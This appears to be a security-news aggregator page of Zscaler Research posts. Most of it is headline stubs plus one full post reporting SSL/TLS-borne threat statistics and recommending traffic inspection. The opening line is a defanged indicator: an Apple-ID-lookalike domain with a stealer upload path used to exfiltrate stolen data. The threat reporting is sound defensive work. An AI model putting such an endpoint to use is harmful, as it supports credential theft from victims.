www.appleidservice[.]jp/stealer/files/upload.php
Categories: Security Posts

### Scammers Use Cheap and Squatted Domains to Create Fake Sites

Zscaler Research - 10 min 49 sec ago
Categories: Security Posts

### What’s hiding in encrypted traffic? Millions of advanced threats.

Zscaler Research - 10 min 49 sec ago
Once seen as the ultimate protection for data being transmitted over the internet, encryption has become a vast playground for cybercriminals. Zscaler ThreatLabZ, the research organization at Zscaler, analyzed the encrypted traffic traversing the Zscaler cloud in the second half of 2018 and prepared a report of our findings. The Zscaler cloud processes more than 60 billion transactions a day and, at that volume, it provides valuable insight into traffic patterns and the types of threats organizations are facing globally. We already knew that the use of encryption had been rising each year and our research showed this trend continuing. By December 2018, the amount of encrypted traffic on the Zscaler cloud increased by 10 percent to nearly 80 percent of all traffic. This growth rate is consistent with that of the Google Transparency Report and Mozilla’s findings for the Firefox browser. Zscaler has always made its cloud statistics available to anyone who wants to see them. We have recently created a dashboard that shows the volume of encrypted traffic crossing our cloud as a percentage of total traffic. You can view that interactive dashboard here. Real-Time Zscaler Cloud Activity: Encrypted Traffic Dashboard As the use of SSL* grows, cybercriminals are increasingly using encryption to conceal and launch attacks. In the second half of 2018, the Zscaler cloud blocked 1.7 billion threats hidden in SSL traffic, which translates to an average of 283 million advanced threats blocked per month. The top blocked threat categories in our study period included phishing attempts—which increased more than 400 percent over 2017—as well as malicious content, botnets, and browser exploits. One of the reasons that SSL-based threats have increased so dramatically is because SSL/TLS certificates, which were once expensive and difficult to obtain, are now easy to get—at no charge. The vast majority of the certificates involved in security blocks in the Zscaler cloud were issued by Let’s Encrypt, a free service. Furthermore, nearly 32 percent of newly registered domains that were blocked by our cloud were using SSL encryption to deliver the content. We recommend inspecting and/or restricting access to newly registered domains, including those using SSL, to scan for malicious content being delivered from an otherwise unknown location with no history or reputation. While the percentage of growth in SSL traffic is slowing as it reaches near totality, the threat trends are increasing in both frequency and sophistication. Cybercriminals know that most organizations are unable to inspect SSL traffic at scale. So, with malicious websites that can be set up in no time with free SSL certificates, they’re launching attacks that have a good chance of going undetected. Organizations should be inspecting all encrypted traffic, even from CDNs and trusted sites, because many of the threats we continue to block are from legitimate sites that have been compromised. Organizations that don’t inspect all traffic are at risk of infiltration that can be difficult to remediate, lead to costly breaches, or damage their reputation. Read the full ThreatLabZ analysis of SSL/TLS-based threats: SSL Report   *The encryption protocol is known by several terms—Secure Sockets Layer (SSL), Transport Layer Security (TLS), and HTTPS—and they are often used interchangeably. For the sake of simplicity, I am using “SSL” in this blog.  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Deepen Desai is Zscaler VP of Security Research and Operations
Categories: Security Posts

### Murkios bot drops files and controls system remotely

Zscaler Research - 10 min 49 sec ago
Categories: Security Posts

### Demystifying the Crypter Used in Emotet, Qbot, and Dridex

Zscaler Research - 10 min 50 sec ago
Categories: Security Posts

### Qealler – a new JAR-based information stealer

Zscaler Research - 10 min 50 sec ago